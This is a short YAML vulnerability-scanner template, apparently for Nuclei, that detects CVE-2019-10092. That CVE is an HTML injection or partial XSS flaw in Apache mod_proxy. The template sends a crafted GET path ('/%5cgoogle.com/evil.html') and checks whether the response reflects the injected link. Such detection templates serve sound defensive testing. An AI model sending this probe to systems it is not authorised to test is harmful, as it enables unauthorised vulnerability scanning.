|
id: CVE-2019-10092
|
|
|
|
info:
|
|
name: Apache mod_proxy HTML Injection / Partial XSS
|
|
author: pd-team
|
|
severity: medium
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/%5cgoogle.com/evil.html'
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<a href=\"/\\google.com/evil.html\">" |